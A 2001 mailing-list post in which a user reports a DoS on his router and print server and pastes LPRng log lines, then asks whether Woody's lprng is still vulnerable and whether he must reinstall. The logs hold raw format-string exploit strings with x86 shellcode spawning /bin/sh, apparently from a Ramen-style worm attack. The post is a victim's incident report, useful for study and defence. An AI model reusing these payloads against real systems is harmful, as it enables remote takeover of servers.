On Thu, 22 Nov 2001 12:06:21 Thomas Amm wrote: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Hi all, that's what I found in my logs after I had to reboot my Router, which also worked as print server (Now I know better) because of a DoS. Nov 21 03:29:36 lan1 -- MARK -- Nov 21 03:32:08 lan1 SERVER[2757]: Dispatch_input: bad request line 'BBÜóÿ¿Ýóÿ¿Þóÿ¿ßóÿ¿XXXXXXXXXXXXXXXXXX%.156u%300$n%.21u%301$nsecurity%302$n%.192u %303$n1Û1É1À°FÍå1Ò²fÐ1ÉËC]øC]ôKMüMôÍ1ÉEôCf]ìfÇEî^O'MðEìEøÆEü^PÐMôÍÐCCÍÐCÍÃ1ɲ?ÐÍ ÐAÍë^X^u^H1ÀF^GE^L°^KóM^HU^LÍèãÿÿÿ/bin/sh' Nov 21 03:32:10 lan1 SERVER[2758]: Dispatch_input: bad request line 'BB(ñÿ¿)ñÿ¿*ñÿ¿+ñÿ¿XXXXXXXXXXXXXXXXXX%.232u%300$n%.199u%301$nsecurity.i%302$n%.1 92u%303$n1Û1É1À°FÍå1Ò²fÐ1ÉËC]øC]ôKMüMôÍ1ÉEôCf]ìfÇEî^O'MðEìEøÆEü^PÐMôÍÐCCÍÐCÍÃ1ɲ ?ÐÍÐAÍë^X^u^H1ÀF^GE^L°^KóM^HU^LÍèãÿÿÿ/bin/sh' Nov 21 03:32:11 lan1 SERVER[2759]: Dispatch_input: bad request line 'BBH (and so on) - the lpr.log shows the same entries. I searched the system for fragments of the Ramen worm after reboot but I found nothing suspicious. The attack seemed to come over nmbd, although all ports, exept inetd are blocked to the outside vi ipchains. I had a number of rejected packets to port 137 immediately before, nmbd crashed and the lprng exploit started. So there are some questions, I would like to pose : Is Woody's lprng still vulnerable ? I've got the latest version. Is the shown exploit a sign that someone already was in there, or just for an attempt ? Can I find possible backdoors, or will I have to re-install ? Thanks, -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iEYEARECAAYFAjv829UACgkQRMvUAcFGSvDcwACgw39Hh2j83YJ1v42pgwJvL1je ryoAoP8tSMHNsBuH3jRtU6WG07MnQ48t =8csx -----END PGP SIGNATURE----- -- Things are more like they are today than they ever were before. -- Dwight Eisenhower
